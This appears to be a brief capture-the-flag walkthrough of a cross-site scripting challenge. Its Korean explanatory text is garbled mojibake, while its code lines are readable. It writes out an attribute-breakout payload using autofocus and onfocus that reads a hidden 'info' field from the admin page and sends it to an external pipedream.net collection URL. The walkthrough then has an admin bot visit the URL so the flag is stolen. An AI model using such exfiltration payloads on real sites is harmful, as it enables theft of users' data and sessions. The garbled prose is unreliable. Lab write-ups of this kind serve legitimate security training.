๊ด๋ฆฌ์ ๊ณ์ ์ผ๋ก ๋ค์ด๊ฐ๋ฉด Flag Here...! ์นธ์ ํ๋๊ทธ๊ฐ ์์ ๊ฒ์ด๋ค.
์คํฌ๋ฆฝํธ ์ฝ์
ํด์ ํ์ทจํด๋ณด์.
์ฐ์ ์คํฌ๋ฆฝํธ ์ฝ์
์ ์ด๋์ ํ ์ ์์์ง ์ดํด๋ณด์.
user ๊ฐ์ ๋ณด๋ด๊ณ ์์ผ๋ user๋ฅผ ์กฐ์ํด๋ณด์.
ํน์๋ฌธ์ ์ฝ์
๊ฐ๋ฅ์ฌ๋ถ ํ์ธ ์ํด test<'"> ์
๋ ฅ
๊บฝ์ ์ฝ์
๊ฐ๋ฅํ๋ฉฐ ์ฐ๋ฆฌ๊ฐ ํ์ทจํด์ผํ๋ ์ ๋ณด์ input name="info" ๊น์ง ํ์ธ.
๊บฝ์ ์ฝ์ ์ด ๊ฐ๋ฅํ์ง๋ง inputํ๊ทธ๋ฅผ ํ์ถํ์ง ์๊ณ ํด๋ณด๋ คํจ.
๋จผ์ alert(1) ์ ์ถ๋ ฅํด๋ณด์.
user๊ฐ ๋ค์
์คํฌ๋ฆฝํธ๊ฐ ์ ์๋ํ๋ ๊ฒ์ ํ์ธํ์ผ๋ ํ์ทจ์ฝ๋๋ฅผ ์จ๋ณด์.
" autofocus
onfocus= "javascript: var flag =document.getElementsByName('info')[0].placeholder;
<!--name='info'๊ฐ ์ง์ ๋ ์ฒซ๋ฒ์งธ ์์์ placeholder์ ๊ฐ์ ๋ถ๋ฌ์ด. -->
var i =new Image();i.src=`https://en2hyoic3j7mi.x.pipedream.net/?flag=${flag}`
Flag Here..! ์ด ์๋์ด์ค๊ณ ์๋ค.
๊ด๋ฆฌ์ ๋ด์๊ฒ URL์ ๋ณด๋ด๋ฉด ๊ด๋ฆฌ์ ๋ง์ดํ์ด์ง์ ์๋ ํ๋๊ทธ๋ฅผ ํ์ทจํ ์ ์์ ๊ฒ์ด๋ค.
๊ด๋ฆฌ์ ์ ๋ณด ํ์ทจ ์๋ฃ!